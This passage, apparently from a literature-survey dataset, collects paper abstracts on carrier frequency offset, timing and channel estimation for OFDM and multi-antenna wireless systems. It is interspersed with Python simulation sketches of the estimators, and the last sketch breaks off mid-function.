joint a posteriori probability distribution of the unknown CFO, information bits and channel coefficients vector given the channel output. 
A combination of particle filtering and Gaussian parameterization is employed to approximate the exact probability density function in message passing for CFO and channel estimation. Computer simulations demonstrate the effectiveness of the proposed algorithm in combating the CFO over unknown Rayleigh fading channels. --- paper_title: ML Estimation of Timing and Frequency Offsets Using Distinctive Correlation Characteristics of OFDM Signals Over Dispersive Fading Channels paper_content: Orthogonal frequency-division multiplexing (OFDM) is a promising technology for communication systems. However, the synchronization of OFDM over dispersive fading channels remains an important and challenging issue. In this paper, a synchronization algorithm for determining the symbol timing offset and the carrier frequency offset (CFO) in OFDM systems, based on the maximum-likelihood (ML) criterion, is described. The new ML approach considers time-dispersive fading channels and employs distinctive correlation characteristics of the cyclic prefix at each sampling time. The proposed symbol timing estimation is found to be a 2-D function of the symbol timing offset and channel length. When compared with previous ML approaches, the proposed likelihood function is optimized at each sampling time without requiring additional pilot symbols. To practically realize the proposed method, a suboptimum approach to the ML estimation is adopted, and an approximate but closed-form solution is presented. Nonlinear operations of the approximate solution can be implemented using a conventional lookup table to reduce the computational complexity. The proposed CFO estimation is also found to depend on the channel length. Unlike conventional schemes, the proposed method fully utilizes the delay spread of dispersive fading channels (which usually reduces the accuracy of estimations). Furthermore, the Cramer-Rao lower bound (CRLB) on the CFO estimate is analyzed, and simulations confirm the advantages of the proposed estimator. --- paper_title: Joint Frequency-Domain Equalization & Spectrum Combining for the Reception of SC Signals in the Presence of Timing Offset paper_content: Frequency-domain equalization (FDE) based on minimum mean square error (MMSE) criterion is a promising equalization technique for the broadband single-carrier (SC) transmission. However, the presence of timing offset produces the inter-symbol interference (ISI) and degrades the bit error rate (BER) performance. As the roll-off factor of the transmit filter increases, the performance degradation gets larger. In this paper, we propose joint MMSE-FDE & spectrum combining which can achieve the frequency diversity gain while suppressing the negative impact of timing offset for the SC transmission. --- paper_title: SINR Lower Bound Based Multiuser Detector for Uplink MC-CDMA Systems with Residual Frequency Offset paper_content: For uplink multi-carrier code-division multiple access (MC-CDMA) systems, we propose a multiuser detector that is robust to a small residual frequency offset existing after frequency offset estimation and compensation. In this paper, when the residual frequency offset is normalized by subcarrier spacing, it is called a normalized residual frequency offset (NRFO). In the proposed scheme, we first derive a lower bound of the signal-to-interference plus noise ratio (SINR) of the desired user when the NRFO of the desired user is bounded by a small value and the value is known to the receiver. 
We then design a detection filter to maximize the SINR lower bound. Simulation results show that the proposed scheme has better SINR and bit error rate (BER) performances in a high signal-to-noise ratio (SNR) region than a conventional minimum mean square error (MMSE) receiver that ignores the NRFO. --- paper_title: Semiblind Iterative Data Detection for OFDM Systems with CFO and Doubly Selective Channels paper_content: Data detection for OFDM systems over unknown doubly selective channels (DSCs) and carrier frequency offset (CFO) is investigated. A semiblind iterative detection algorithm is developed based on the expectation-maximization (EM) algorithm. It iteratively estimates the CFO, channel and recovers the unknown data using only limited number of pilot subcarriers in one OFDM symbol. In addition, efficient initial CFO and channel estimates are also derived based on approximated maximum likelihood (ML) and minimum mean square error (MMSE) criteria respectively. Simulation results show that the proposed data detection algorithm converges in a few iterations and moreover, its performance is close to the ideal case with perfect CFO and channel state information. --- paper_title: Parameter Estimation and Tracking in Physical Layer Network Coding paper_content: In this paper, we present an algorithm for joint decoding of the modulo-2 sum of the bits transmitted from two unsynchronized transmitters using Physical Layer Network Coding (PLNC). We address the problems that arise when the boundaries of the signals do not align with each other and when the channel parameters are slowly varying and are not known to the receiver at the relay node. Our approach first estimates jointly the timing and fading gains of both the signals, and uses a state-based Viterbi decoding scheme that takes into account the timing offsets between the interfering signals. We also track the amplitude and phase of the channel which may be slowly varying. Simulation results demonstrate the sensitivity of the detection performance at the relay node to the relative offset of the timings of the two user's signals as well as the advantage of our algorithm over previously published algorithms. --- paper_title: Impact of pilot pattern on carrier frequency recovery for TETRA-like multitone modulations paper_content: A study of maximum-likelihood pilot-aided frequency offset recovery for filtered multitone modulations such as that employed in the TETRA Release 2 Enhanced Data Service is presented. An approach is proposed to improve on previously published algorithms. When pilot symbols are arranged on a rectangular time–frequency grid, as envisaged by the cited standard, the acquisition range of a pilot-based frequency synchroniser may seem to be very narrow as it cannot exceed the inverse of pilot spacing in the time-domain. It is shown that the above drawback can be relieved by resorting to a pilot pattern where the pilot symbols are simply shifted in time along the subcarriers with respect to the rectangular arrangement. --- paper_title: Joint ml estimation of frame timing and carrier frequency offset for OFDM systems employing time-domain repeated preamble paper_content: When a preamble signal is repeated multiple times in OFDM systems, we derive joint maximum likelihood (ML) estimation of the frame timing (FT) and carrier frequency offset (CFO). 
Unlike conventional estimators which use correlation of adjacent repetition patterns only or some specific sets of patterns, the joint ML estimation exploits correlation of any pair of repetition patterns, providing optimized performance. To reduce the implementation complexity involved in the joint ML estimation, we also propose a near-ML estimation method that separates estimation of the FT and the CFO. The performance of the proposed methods is verified by computer simulation. --- paper_title: Blind timing and carrier synchronisation in distributed multiple input multiple output communication systems paper_content: This study addresses the problem of joint blind timing and carrier synchronisation in a (distributed-M ) × N antenna system where the objective is to estimate the M carrier offsets, the M timing offsets and to recover the transmitted symbols for each of the M users given only the measured signal at the N antennas of the receiver. The authors propose a modular receiver structure that exploits blind source separation to reduce the problem into more tractable sub-problems of estimating individual timing and carrier offsets for multiple users. This leads to a robust solution of low complexity. The authors investigate the performance of the estimators analytically using modified Cramer- Rao bounds and computer simulations. The results show that the proposed receiver exhibits robust performance over a wide range of parameter values, even with worst-case Doppler of 200- 300 Hz and frame size as small as 400 symbols. This work is relevant to future wireless networks and is a complete solution to the problem of estimating multiple timing and carrier offsets in distributed multiple input multiple output (MIMO) communication systems. --- paper_title: Preamble Based Joint CFO, Frequency-Selective I/Q-Imbalance and Channel Estimation and Compensation in MIMO OFDM Systems paper_content: A very promising technical approach for future wireless communication systems is to combine MIMO OFDM and Direct (up/down) Conversion Architecture (DCA). However, while OFDM is sensitive to Carrier Frequency Offset (CFO), DCA is sensitive to I/Q-imbalance. Such RF impairments can seriously degrade the system performance. For the compensation of these impairments, a preamble-based scheme is proposed in this paper for the joint estimation of CFO, transmitter (Tx) and receiver (Rx) frequency-selective I/Q-imbalance and the MIMO channel. This preamble is constructed both in time- and frequency domain and requires much less overhead than the existing designs. Moreover, Closed-Form Estimators (CLFE) are allowed, enabling efficient implementation. The advantages and effectiveness of the proposed scheme have been verified by numerical simulations. --- paper_title: Pilot-Aided Joint CFO and Doubly-Selective Channel Estimation for OFDM Transmissions paper_content: This paper studies the problem of pilot-aided joint carrier frequency offset (CFO) and channel estimation using Fisher and Bayesian approaches in orthogonal frequency division multiplexing (OFDM) transmissions over time- and frequency-selective (doubly selective) channels. In particular, the recursive-least-squares (RLS) and maximum-likelihood (ML) techniques are used to facilitate the Fisher estimation implementations. For the Bayesian estimation, the maximum-a-posteriori (MAP) principle is employed in formulating the joint estimation problem. 
With known channel statistics, the MAP-based estimation is expected to provide better performance than the RLS- and ML-based ones. To avoid a possible identifiability issue in the joint estimation problem, various basis expansion models (BEMs) are deployed as fitting parametric models for capturing the time-variation of the channels. Numerical results and related Bayesian Cramer Rao bounds (BCRB) demonstrate that the deployment of BEMs is able to alleviate performance degradation in the considered estimation techniques using the conventional block-fading assumption over time-varying channels. Among the considered schemes, the MAP-based estimation using the discrete prolate spheroidal (DPS) or Karhuen Loeve (KL) basis functions would be the best choice that can provide mean-squared-error (MSE) performance comparable to BCRB in low signal-to-noise ratio (SNR) conditions (e.g., coded OFDM transmissions). --- paper_title: Iterative Joint Estimation Procedure for Channel and Frequency Offset in Multi-Antenna OFDM Systems With an Insufficient Cyclic Prefix paper_content: This paper addresses a strategy to improve the joint channel and frequency offset (FO) estimation in multi-antenna systems, widely known as multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM), in the presence of intersymbol interference (ISI) and intercarrier interference (ICI) occasioned by an insufficient cyclic prefix (CP). The enhancement is attained by the use of an iterative joint estimation procedure (IJEP) that successively cancels the interferences located in the preamble of the OFDM frame, which is used for the joint estimation and initially contains the interferences due to a CP shorter than the channel length. The IJEP requires at certain steps a proper iterative interference cancellation algorithm, which makes use of an initial FO compensation and channel estimation obtained due to the use of a symmetric sequence in the preamble. After the iterative cancellation of interferences, the procedure performs an additional joint channel and FO estimation whose mean square error converges to the Cramér-Rao bound (CRB). Later on, this subsequent joint estimation permits the removal of the interferences in the data part of the frame, which are also due to an insufficient CP, in the same iterative fashion but saving iterations compared with the use of other estimation strategies. The appraisal of the procedure has been performed by assessing the convergence of the simulated estimators to the CRB as a function of the number of iterations. Additionally, simulations for the evaluation of the bit error rate (BER) have been carried out to probe how the utilization of the proposed IJEP clearly improves the performance of the system. It is concluded that, with a reduced number of iterations in the preamble, the IJEP converges to the theoretical bounds, thus reducing the disturbances caused by a hard wireless channel or a deliberately insufficient CP. Therefore, this eases the interference cancellation in the data part, leading to an improvement in the BER that approximates to the ideal case of a sufficient CP and, consequently, an improvement in the computational cost of the whole procedure that has been analyzed. 
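Several of the preamble-based schemes above (for example the repeated-preamble joint ML frame-timing/CFO estimator and the symmetric-preamble procedure for the insufficient-CP case) build on the same basic observation: a carrier frequency offset rotates the second half of a repeated training pattern relative to the first half by a phase proportional to the offset. The sketch below is a minimal simulation of that correlation-based fractional CFO estimate, assuming an AWGN channel and a preamble made of two identical halves; it is a generic illustration of the principle, not the exact estimator of any one cited paper.

```python
import numpy as np

def estimate_cfo_repeated_preamble(rx, half_len):
    """Fractional CFO estimate (in subcarrier spacings) from a preamble made of
    two identical halves of length `half_len` samples. A CFO of eps subcarriers
    rotates the second half by pi*eps relative to the first (N = 2*half_len)."""
    first, second = rx[:half_len], rx[half_len:2 * half_len]
    corr = np.vdot(first, second)          # sum(conj(first) * second)
    return np.angle(corr) / np.pi          # unambiguous for |eps| < 1

rng = np.random.default_rng(0)
N = 64                                     # preamble length (two halves of 32)
eps_true = 0.23                            # CFO in subcarrier spacings
half = (rng.standard_normal(N // 2) + 1j * rng.standard_normal(N // 2)) / np.sqrt(2)
preamble = np.concatenate([half, half])
n = np.arange(N)
rx = preamble * np.exp(2j * np.pi * eps_true * n / N)                 # apply CFO
rx += 0.05 * (rng.standard_normal(N) + 1j * rng.standard_normal(N))   # AWGN

print("estimated CFO:", estimate_cfo_repeated_preamble(rx, N // 2))
```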
--- paper_title: Estimation algorithms of multiple channels and carrier frequency offsets in application to multiuser OFDM systems paper_content: This paper introduces new joint estimation methods of multiple carrier frequency offsets (CFOs) and channel impulse responses (CIR) in application to multiuser orthogonal frequency division multiplexing (OFDM) systems. The estimators are derived from the optimal maximum-likelihood (ML) principle. Complexity reductions are achieved by exploiting the correlation properties of the training sequence (TS). The grid search algorithm is converted into a polynomial root finding procedure which leads to low-complexity closed-form estimators for moderate CFOs. Furthermore, iterative estimators for larger CFOs are proposed. Numerical results confirm that the performance degradation due to the approximations compared to the Cramer-Rao bound (CRB) is small and may be negligible in practice. --- paper_title: A Low-Delay Low-Complexity EKF Design for Joint Channel and CFO Estimation in Multi-User Cognitive Communications paper_content: Parameter estimation in cognitive communications can be formulated as a multi-user estimation problem, which is solvable under maximum likelihood solution but involves high computational complexity. This paper presents a time-sharing and interference mitigation based EKF (Extended Kalman Filter) design for joint CFO (carrier frequency offset) and channel estimation at multiple cognitive users. The key objective is to realize low implementation complexity by decomposing high-dimensional parameters into multiple separate low-dimensional estimation problems, which can be solved in a time-shared manner via pipelining operation. We first present a basic EKF design that estimates the parameters from one TX user to one RX antenna. Then such basic design is time-shared and reused to estimate parameters from multiple TX users to multiple RX antennas. Meanwhile, we use an interference mitigation module to cancel the co-channel interference at each RX sample. In addition, we further propose an adaptive noise variance tracking module to improve the estimation performance. The proposed design enjoys low delay and low buffer size (because of its online real-time processing), as well as low implementation complexity (because of time-sharing and pipelining design). Its estimation performance is verified to be close to the Cramer-Rao bound. --- paper_title: Frequency-domain processing for synchronization and channel estimation in OQAM-OFDM systems paper_content: In this work the design of a frequency-domain synchronization and channel estimation scheme for OQAM-OFDM systems is presented and evaluated. The need for signal processing schemes for wireless communication systems that are processed solely in the frequency domain results from the desire to build frequency-agile radios. Driven by the transition from exclusive spectrum resource allocation towards a dynamic usage of the spectrum, a non-contiguous spectrum utilization in fragmented spectrum is needed. Well-known time-domain algorithms severely suffer from encapsulated spectral components not belonging to the non-contiguous OQAM-OFDM waveform. We show that frequency-domain processing can achieve similar system performance as comparable time-domain methods over a wide range of frequency offsets while offering a new degree of freedom in preamble design for FBMC systems.
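The time-shared EKF design summarized above ("A Low-Delay Low-Complexity EKF Design for Joint Channel and CFO Estimation in Multi-User Cognitive Communications") treats the CFO and the channel as a joint state updated from each received pilot sample. The sketch below is a deliberately simplified single-user, single-tap version of that idea, assuming a random-walk state model and known pilot symbols; it is meant only to show the EKF structure (nonlinear measurement through the CFO phase term, linearization via the Jacobian), not the paper's full multi-user, interference-mitigating design.

```python
import numpy as np

def ekf_cfo_channel(y, pilots, N, q=1e-6, r=1e-2):
    """Minimal EKF tracking one complex channel tap h and a normalized CFO eps
    from known pilots. State x = [Re(h), Im(h), eps]; measurement
    y[n] = h * pilots[n] * exp(j*2*pi*eps*n/N) + noise, stacked as [Re, Im]."""
    x = np.array([1.0, 0.0, 0.0])            # crude initial guess
    P = np.diag([1.0, 1.0, 0.1])
    Q = q * np.eye(3)                         # random-walk process noise
    R = (r / 2) * np.eye(2)                   # measurement noise per real dimension
    for n, (yn, sn) in enumerate(zip(y, pilots)):
        P = P + Q                             # prediction (identity state transition)
        h = x[0] + 1j * x[1]
        rot = np.exp(2j * np.pi * x[2] * n / N)
        z_pred = h * sn * rot                 # predicted measurement
        d_eps = h * sn * rot * 2j * np.pi * n / N          # d z / d eps
        H = np.array([[np.real(sn * rot), -np.imag(sn * rot), np.real(d_eps)],
                      [np.imag(sn * rot),  np.real(sn * rot), np.imag(d_eps)]])
        innov = np.array([np.real(yn - z_pred), np.imag(yn - z_pred)])
        S = H @ P @ H.T + R
        K = P @ H.T @ np.linalg.inv(S)
        x = x + K @ innov
        P = (np.eye(3) - K @ H) @ P
    return x[0] + 1j * x[1], x[2]

rng = np.random.default_rng(1)
N, n_pilots = 64, 256
h_true, eps_true = 0.8 - 0.5j, 0.05
pilots = (2 * rng.integers(0, 2, n_pilots) - 1).astype(complex)   # BPSK pilots
n_idx = np.arange(n_pilots)
y = h_true * pilots * np.exp(2j * np.pi * eps_true * n_idx / N)
y += 0.05 * (rng.standard_normal(n_pilots) + 1j * rng.standard_normal(n_pilots))
h_hat, eps_hat = ekf_cfo_channel(y, pilots, N)
print("h_hat:", h_hat, " eps_hat:", eps_hat)
```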
--- paper_title: Self-encoded multi-carrier spread spectrum with iterative despreading for random residual frequency offset paper_content: In this study, we investigate the multi-carrier spread spectrum (MCSS) communication system which adopts the self-encoded spread spectrum in a downlink synchronous channel. It is very difficult to completely eliminate the frequency offset in practical channel scenarios. We demonstrate that the self-encoded MCSS (SE-MCSS) with iterative despreading manifests a remarkable immunity to residual frequency offset. The SE-MCSS can be an excellent candidate for the future generation of wireless services. --- paper_title: Tight PEP Lower Bound for Constellation-Rotated Vector-OFDM Under Carrier Frequency Offset and Fast Fading paper_content: In this paper, we study pairwise error probability (PEP) of a system employing constellation-rotated vector orthogonal frequency-division multiplexing (CRV-OFDM), which is an enhancement of vector OFDM (V-OFDM) with enhanced diversity, over a frequency-selective channel with both carrier frequency offset (CFO) and Doppler frequency spread. First, we extend the work of Rugini and Banelli, which is known to give a good bit-error rate (BER) approximation for the standard OFDM system only with CFO, to PEP evaluation for CRV-OFDM and discuss its limitations. Then, we discuss the conditionally Gaussian characteristics of the Doppler-induced interference and propose a conditionally Gaussian PEP approximation. Confirming a good match of the conditionally Gaussian PEP approximation with simulation results, we propose a new semianalytical PEP lower bound. The new lower bound is computationally feasible and is shown by simulation to be tight for small to moderate CFO. Finally, a computationally more feasible approximation of the lower bound is also proposed. Our discussion reveals, as a by-product, why the Gaussian assumption for the Doppler-induced interference works for standard OFDM systems although the assumption is actually incorrect. --- paper_title: Cooperative Relaying Using OFDM in the Presence of Frequency Offsets paper_content: We study the performance of cooperative relaying using orthogonal frequency division multiplexing (OFDM) in the presence of frequency offsets due to Doppler shifts and oscillator instabilities. Through this study, several aspects of transmitter and receiver design, including channel coding, subcarrier mapping and channel estimation are brought to light. We develop two linear front-end receiver architectures based on practical single-user OFDM receivers, and demonstrate the performance using simulations under quasi-static multipath fading channel conditions. --- paper_title: Joint CFO and Channel Estimation for Asynchronous Cooperative Communication Systems paper_content: This letter addresses the joint maximum likelihood carrier frequency offset (CFO) and channel estimation for asynchronous cooperative communication systems. We first present a space-alternating generalized expectation-maximization (SAGE) based iterative estimator (SAGE-IE). Then a low-complexity approximate SAGE-IE (A-SAGE-IE) is developed. Our proposed algorithms decouple the multi-dimensional optimization problem into many one-dimensional optimization problems where the CFO and channel coefficients of each relay-destination link can be determined separately.
Simulations indicate that, even though timing offsets are present, the proposed estimators can asymptotically achieve the Cramer-Rao bound (CRB) for the perfectly timing synchronized case. --- paper_title: Traffic-reduced precise ranging protocol for asynchronous UWB positioning networks paper_content: This letter proposes a precise two-way ranging (TWR) protocol toward low traffic for asynchronous UWB positioning networks. The proposed TWR protocol pursuing instantaneous ranging update enables the estimation of clock frequency offset to achieve high ranging accuracy. Theoretical analysis and simulation results verify the performance. --- paper_title: A novel channel estimation technique for OFDM systems with robustness against timing offset paper_content: A new interpolation based channel estimation technique has been proposed to eliminate the effect of phase rotation caused by symbol timing offset (STO) in comb-type pilot-aided OFDM systems. STO is one of the most severe impairments that leads to inter-symbol interference (ISI) and phase rotation of FFT outputs and results in performance degradation in OFDM systems. The main advantage of the proposed channel estimation technique is its insensitivity to the impact of phase rotation. Subsequently, the fine timing synchronization process (which tries to cancel the residual STO) in conventional timing synchronization methods can be eliminated. The main idea behind the proposed technique is to separate the phase and the magnitude components of the estimated channel frequency response at the pilot subcarriers. In this way, two steps of interpolation are performed for both the phase and magnitude, separately and independently. Computational complexity of the proposed channel estimation method is approximately equal to that of the conventional one. Analytical and simulation results of applying the proposed technique to the DVB-T system show that the achieved BER performance is close to that of the conventional method in the absence of any timing offset, while in the presence of STO, the proposed technique outperforms the conventional method, considerably. --- paper_title: An Efficient Blind Deterministic Frequency Offset Estimator for OFDM Systems paper_content: This paper proposes an efficient blind deterministic carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) systems. In the proposed method, two OFDM symbols with time difference are generated by exploiting both the oversampled OFDM signal and the cyclic prefix, and a cost function is introduced for CFO estimation. It is shown that the cost function can be expressed as a cosine function. Using a property of the cosine function, a formula for estimating the CFO is derived. The estimator of the CFO requires three independent cost function values calculated at three different frequency offsets. Using the formula, the CFO can be estimated without searching all the frequency offset range. The proposed method is very suitable for real wireless environments since it requires only one OFDM symbol for blind reliable estimation of CFO. The computer simulations show that the performance of the proposed method is superior to those of the MUSIC method and the oversampling method. Unlike the conventional methods such as the MUSIC method and the oversampling method, the accuracy of the proposed method is independent of the searching step.
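The interpolation-based channel estimator summarized above ("A novel channel estimation technique for OFDM systems with robustness against timing offset") rests on a simple manipulation: a residual timing offset adds a linear phase ramp across subcarriers, so interpolating the magnitude and the (unwrapped) phase of the pilot estimates separately preserves that ramp instead of smearing it. The following sketch, assuming comb-type pilots and least-squares estimates at the pilot positions, shows this two-step interpolation; the pilot spacing and channel model are illustrative choices, not the paper's exact configuration.

```python
import numpy as np

def interpolate_mag_phase(pilot_idx, h_pilot, n_sc):
    """Interpolate a channel frequency response from pilot-position estimates by
    treating magnitude and unwrapped phase separately, so the linear phase ramp
    caused by a residual timing offset is preserved."""
    all_idx = np.arange(n_sc)
    mag = np.interp(all_idx, pilot_idx, np.abs(h_pilot))
    phase = np.interp(all_idx, pilot_idx, np.unwrap(np.angle(h_pilot)))
    return mag * np.exp(1j * phase)

rng = np.random.default_rng(2)
n_sc, n_tap, sto = 64, 4, 2                      # subcarriers, channel taps, timing offset (samples)
taps = (rng.standard_normal(n_tap) + 1j * rng.standard_normal(n_tap)) / np.sqrt(2 * n_tap)
H = np.fft.fft(taps, n_sc)                       # true channel frequency response
k = np.arange(n_sc)
H_sto = H * np.exp(-2j * np.pi * sto * k / n_sc) # phase ramp from the timing offset

pilot_idx = np.arange(0, n_sc, 8)                # comb-type pilots on every 8th subcarrier
pilot_syms = np.ones(pilot_idx.size, dtype=complex)
rx_pilots = H_sto[pilot_idx] * pilot_syms
h_ls = rx_pilots / pilot_syms                    # least-squares estimates at the pilots

H_hat = interpolate_mag_phase(pilot_idx, h_ls, n_sc)
print("mean abs error:", np.mean(np.abs(H_hat - H_sto)))
```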
--- paper_title: DoA Estimation with Compensation of Hardware Impairments paper_content: We consider the estimation of the direction of arrival (DoA) in the presence of hardware impairments that include the RF carrier frequency offsets, the phase offsets generated by an uncalibrated array, and the DC offset. The impairments model has been derived from the analysis of a hardware multiple antenna test-bed that uses direct down-conversion RF front-ends. The performance of the proposed algorithm has been investigated both analytically and via simulations. We show that the estimator provides good performance for a wide range of angles and it is robust to the hardware impairments. --- paper_title: Robust, Low-Complexity, and Energy Efficient Downlink Baseband Receiver Design for MB-OFDM UWB System paper_content: This paper presents optimized synchronization algorithms and architecture designs of a downlink baseband receiver for multiband orthogonal frequency division multiplexing ultra wideband (MB-OFDM UWB). The receiver system targets low complexity and low power under the premise of good performance. At algorithm level, a dual-threshold (DT) detection method is proposed for robust detection performance in timing synchronization; the multipartite table method (MTM) is employed to implement arctangent and sin/cos functions in coarse frequency synchronization. MTM outperforms other state-of-the-art methods in power and area. A highly simplified phase tracking method is proposed with better performance in fine frequency synchronization. At architecture level, we focus on optimizing the matched filter of the packet detector, the carrier frequency offset (CFO) corrector and the FFT output reorder buffer. The proposed downlink baseband receiver is implemented with 0.13 μm CMOS technology. The core area of layout is 2.66 × 0.94 mm2, which saves 45.1% hardware cost due to the low-complexity synchronization algorithms and architecture optimization. The postlayout power consumption is 170 mW at 132 MHz clock frequency, which is equivalent to 88 pJ/b energy efficiency at 480 Mbps data rate. --- paper_title: A fine carrier recovery algorithm robust to doppler shift for OFDM systems paper_content: In this paper, a fine carrier recovery algorithm is proposed to maintain the synchronization even in a severe Doppler shift for orthogonal frequency division multiplexing (OFDM) systems such as digital video broadcasting for handheld (DVB-H), DVB for terrestrial (DVB-T) and DVB-T2. The proposed algorithm estimates the frequency offset by utilizing correlation values in the received OFDM symbols by adding intentional frequency offsets. Its performance is compared with conventional algorithms for the DVB-H system in fading with Doppler. --- paper_title: Exact SINR analysis of wireless OFDM in the presence of carrier frequency offset paper_content: This paper presents a new mathematical analysis for the evaluation of the average signal-to-interference plus noise ratio (SINR) of orthogonal frequency division multiplexing (OFDM) in the presence of carrier frequency offset (CFO). CFO destroys the orthogonality between different subcarriers giving rise to inter-carrier interference (ICI). The SINR of wireless OFDM in the presence of CFO and frequency-selective fading becomes a ratio of correlated random variables, and the exact evaluation of its average by using direct methods requires a huge computational effort.
In this paper, we present an indirect method that leads to a new, simpler exact expression for the average SINR over Rayleigh multipath fading channels. --- paper_title: IQ Imbalance Estimation Scheme with Intercarrier Interference Self-Cancellation Pilot Symbols in OFDM Direct Conversion Receivers paper_content: Direct conversion receivers in orthogonal frequency division multiplexing (OFDM) systems suffer from direct current (DC) offset, frequency offset, and IQ imbalance. We have proposed an IQ imbalance estimation scheme in the presence of DC offset and frequency offset, which uses pilot subcarriers in the frequency domain. In this scheme, the DC offset is eliminated by a differential filter. However, the accuracy of IQ imbalance estimation is deteriorated due to the intercarrier interference (ICI) components caused by frequency offset. To overcome this problem, a new IQ imbalance estimation scheme with intercarrier interference self-cancellation pilot symbols in the frequency domain has been proposed in this paper. Numerical results obtained through computer simulation show that estimation accuracy and bit error rate (BER) performance are improved. --- paper_title: An Efficient Reduced-Complexity Two-Stage Differential Sliding Correlation Approach for OFDM Synchronization in the AWGN Channel paper_content: In this paper, we propose a new scheme for data-aided time and frequency synchronization for OFDM systems, based on a single-symbol preamble. The preamble, of useful length $2^{m}-2$, is composed of two consecutive identical m-sequences (with length $2^{m-1}-1$ each). This preamble is extended by a cyclic prefix of convenient length. This structure is adequate for a two-stage synchronization scheme, namely a reduced complexity coarse synchronization stage, followed by a finer synchronization one. The first stage, based on Cox and Schmidl-like sliding correlation, determines a reduced uncertainty interval over which the fine stage is carried. The second stage is indeed based on a differential correlation, which is more complex compared to the first stage. The combined use of m-sequences and differential correlation offers an almost perfect peak of the computed metric at the preamble start. To assess the performance degradation occasioned by the reduction of complexity characterizing the proposed two-stage approach, we also consider the brute force single-stage approach, where differential correlation is exclusively used. As a byproduct of our two-stage approach, the fractional frequency offset is estimated and its performance is assessed and compared for both two-stage and one-stage approaches. The brute force approach outperforms all the considered benchmarks. Compared to the reduced complexity scheme, the brute force one provides similar performance, at the expense of a significant complexity overload. Only for SNR lower than $-5$ dB, the brute force scheme presents a slight enhancement with respect to the reduced complexity one. The simulation results show that the proposed method gives better performance than any other considered estimator. Although our technique is expected to be well suited to multipath channels, thanks to the underlying properties of m-sequences, in this paper we focus on the Additive White Gaussian Noise channel.
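The SINR analysis summarized above ("Exact SINR analysis of wireless OFDM in the presence of carrier frequency offset") concerns how a CFO redistributes each subcarrier's energy into ICI. A quick way to see the mechanism numerically is to take the DFT of a pure complex exponential with a fractional frequency offset: the bin-0 coefficient gives the attenuated desired term and the remaining bins give the ICI leakage. The snippet below does exactly that for an AWGN setting and prints the resulting SINR; it is a basic numerical illustration of the effect under unit-power symbols, not the paper's exact fading-channel analysis.

```python
import numpy as np

def ofdm_sinr_awgn(eps, n_sc, snr_db):
    """SINR on one subcarrier of an N-point OFDM system with normalized CFO `eps`
    (in subcarrier spacings), assuming AWGN and unit-power symbols. The DFT of
    exp(j*2*pi*eps*n/N) gives the desired-term gain (bin 0) and the ICI leakage."""
    n = np.arange(n_sc)
    leak = np.fft.fft(np.exp(2j * np.pi * eps * n / n_sc)) / n_sc
    p_desired = np.abs(leak[0]) ** 2
    p_ici = np.sum(np.abs(leak[1:]) ** 2)          # total leakage power
    noise = 10 ** (-snr_db / 10)
    return p_desired / (p_ici + noise)

for eps in (0.0, 0.05, 0.1, 0.2):
    sinr = ofdm_sinr_awgn(eps, n_sc=64, snr_db=20)
    print(f"eps = {eps:4.2f}  ->  SINR = {10 * np.log10(sinr):5.2f} dB")
```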
--- paper_title: An SFBC-OFDM receiver to combat multiple carrier frequency offsets in cooperative communications paper_content: In this paper, a new space-frequency combination technique is proposed for Alamouti coded Orthogonal Frequency Division Multiplexing (OFDM) in the context of cooperative communications. Since cooperative antennas are distributed, there may exist multiple carrier frequency offsets (MCFOs) which cause problems for conventional space-frequency decoding. The proposed algorithm, taking cues from existing MCFO-compensating algorithms [13][19], combines two sets of separately synchronized signal to mitigate inter-carrier interference (ICI). Iterative interference cancellation and a maximum-ratio-combining-like technique are also deployed to further improve performance with low computational complexity. It is observed that the proposed method achieves better bits error rate (BER) performance and has a superior tolerance of multiple CFOs, compared to existing methods. --- paper_title: Comments on “Estimation of Carrier Frequency Offset With I/Q Mismatch Using Pseudo-Offset Injection in OFDM Systems” paper_content: In a recently published paper, an estimation algorithm of carrier frequency offset (CFO) with I/Q mismatch was proposed. Errors in the derivation of the algorithm show that its precision can only be asserted in the case of relatively small I/Q mismatch. Averaging the intermediate variables among one short preamble period improves the estimation accuracy under conditions where I/Q mismatch is large. --- paper_title: Blind frequency-offset tracking scheme for multiband orthogonal frequency division multiplexing using time-domain spreading paper_content: A blind scheme for estimating the residual carrier-frequency offset of multiband orthogonal frequency division multiplexing (MB-OFDM)-based ultra-wideband (UWB) systems is proposed. In the MB-OFDM UWB system, time-domain spreading (TDS) is used by transmitting the same information across two adjacent OFDM symbols. By using the TDS structure, the proposed frequency estimation scheme does not require the use of pilot symbols. To demonstrate the usefulness of the proposed estimator, analytical expression of the mean square error is derived and the performance is compared with a conventional pilot-assisted estimator. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for Uplink MIMO-OFDMA Systems Using Parallel Schmidt Rao-Blackwellized Particle Filters paper_content: Joint carrier frequency offset (CFO) and channel estimation for uplink MIMO-OFDMA systems over time-varying channels is investigated. To cope with the prohibitive computational complexity involved in estimating multiple CFOs and channels, pilot-assisted and semi-blind schemes comprised of parallel Schmidt Extended Kalman filters (SEKFs) and Schmidt-Kalman Approximate Particle Filters (SK-APF) are proposed. In the SK-APF, a Rao-Blackwellized particle filter (RBPF) is developed to first estimate the nonlinear state variable, i.e. the desired user's CFO, through the sampling-importance-resampling (SIRS) technique. The individual user channel responses are then updated via a bank of Kalman filters conditioned on the CFO sample trajectories. Simulation results indicate that the proposed schemes can achieve highly accurate CFO/channel estimates, and that the particle filtering approach in the SK-APF outperforms the more conventional Schmidt Extended Kalman Filter. 
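The parallel Schmidt/Rao-Blackwellized filters summarized above ("Joint Carrier Frequency Offset and Channel Estimation for Uplink MIMO-OFDMA Systems Using Parallel Schmidt Rao-Blackwellized Particle Filters") exploit the usual RBPF decomposition: the nonlinear part of the state (the CFO) is handled with particles, while the channel, which enters the measurement linearly once a CFO particle is fixed, is tracked with a Kalman filter per particle. The sketch below is a heavily reduced single-user, single-tap version of that structure, assuming a random-walk CFO, BPSK pilots and scalar Kalman recursions; it illustrates the Rao-Blackwellized bookkeeping rather than the paper's full MIMO-OFDMA algorithm.

```python
import numpy as np

def rbpf_cfo_channel(y, pilots, N, n_part=200, q_eps=1e-6, q_h=1e-5, r=0.01, seed=3):
    """Rao-Blackwellized particle filter: CFO handled by particles, one scalar
    Kalman filter per particle for a single complex channel tap h.
    Measurement model: y[n] = h * pilots[n] * exp(j*2*pi*eps*n/N) + CN(0, r)."""
    rng = np.random.default_rng(seed)
    eps = rng.uniform(-0.2, 0.2, n_part)            # CFO particles (subcarrier spacings)
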